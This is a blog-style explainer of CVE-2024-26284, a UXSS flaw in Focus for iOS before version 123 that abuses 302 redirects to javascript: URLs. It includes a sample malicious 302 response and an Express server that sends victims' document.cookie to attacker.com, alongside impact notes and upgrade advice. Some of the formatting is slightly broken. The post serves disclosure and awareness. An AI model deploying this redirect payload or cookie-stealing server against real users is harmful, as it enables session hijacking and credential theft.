CVE-2024-26284 - Exploiting UXSS in Focus for iOS (< 123) with a 302 Redirect

On February 2024, a serious vulnerability — CVE-2024-26284 — was disclosed in Focus for iOS, a popular content blocker. This bug allows attackers to perform a Universal Cross-Site Scripting (UXSS) attack using a clever trick with HTTP 302 redirects. If a victim website simply linked to a malicious site, anyone using an outdated version of Focus could have their browser compromised.

This post simplifies the mechanics, code, and real-world risks, covering everything you need to know about CVE-2024-26284.

What is UXSS, and Why Does It Matter?

UXSS (Universal Cross-Site Scripting) is a browser vulnerability, not just a site’s bug. It allows attackers to run malicious JavaScript on *any* site a user visits, bypassing the normal browser security barriers. In short: it’s a bug in the browser or extension.

How Did the Exploit Work?

The attack hinges on how Focus for iOS (versions < 123) mishandled cross-origin redirects. Consider this flow:

1. The victim visits a trusted website (example.com) that includes a link to a malicious domain (evil.com).

evil.com returns a 302 HTTP redirect to a URL containing JavaScript payload.

3. Because of improper validation, Focus for iOS executes the script in the context of the original site, not evil.com.

The result: the attacker can steal cookies, credentials, or manipulate content as if they are example.com, not evil.com.

Here’s what evil.com does when visited

HTTP/1.1 302 Found
Location: javascript:alert('Hacked via CVE-2024-26284')
Content-Type: text/html

This response sends the browser to a URL using the javascript: scheme.

Victim Site Contains This Innocent Link

<!-- On example.com -->
<a href="https://evil.com">Click me!</a>

A Focus for iOS (<123) user clicks this — or, in some cases, even automatic requests can trigger it.

Browser’s Wrong Handling

Due to Focus’s bug, the browser evaluated the javascript: payload in the context of example.com, not evil.com. Any page data, local storage, or cookies from example.com might be accessible!

evil.com’s server (Node.js/Express example)

// server.js
const express = require('express');
const app = express();

app.get('/', (req, res) => {
  res.set('Location', "javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)");
  res.status(302).send('<html><body>Redirecting...</body></html>');
});

app.listen(808, () => console.log('Attacker server running'));

Note: Once triggered, the victim visits evil.com, gets redirected, and JavaScript executes with the privileges of the *victim site*.

Impact

- Total session hijack: Attacker steals session cookies of any site victim visits and clicks a link to evil.com.

Upgrade Focus for iOS to 123 or newer.

- Web admins: avoid linking to questionable third-party domains, especially if you serve sensitive content.

References

- CVE-2024-26284 at NVD
- Apple Security Updates
- OWASP XSS Cheat Sheet
- Universal XSS Explained

Conclusion

CVE-2024-26284 is a powerful example of how a single misstep in redirect handling can create a browser-wide security hole. These bugs aren’t common in major browsers today, but extensions like Focus can sometimes reintroduce serious risks. Always patch quickly, and never underestimate the threat from *just a link*.

Stay safe. Share this post. Spread awareness.

*This content is exclusive and written in accessible language for developers, sysadmins, and security-conscious users alike.*

Timeline

Published on: 02/22/2024 15:15:08 UTC
Last modified on: 12/31/2024 14:39:53 UTC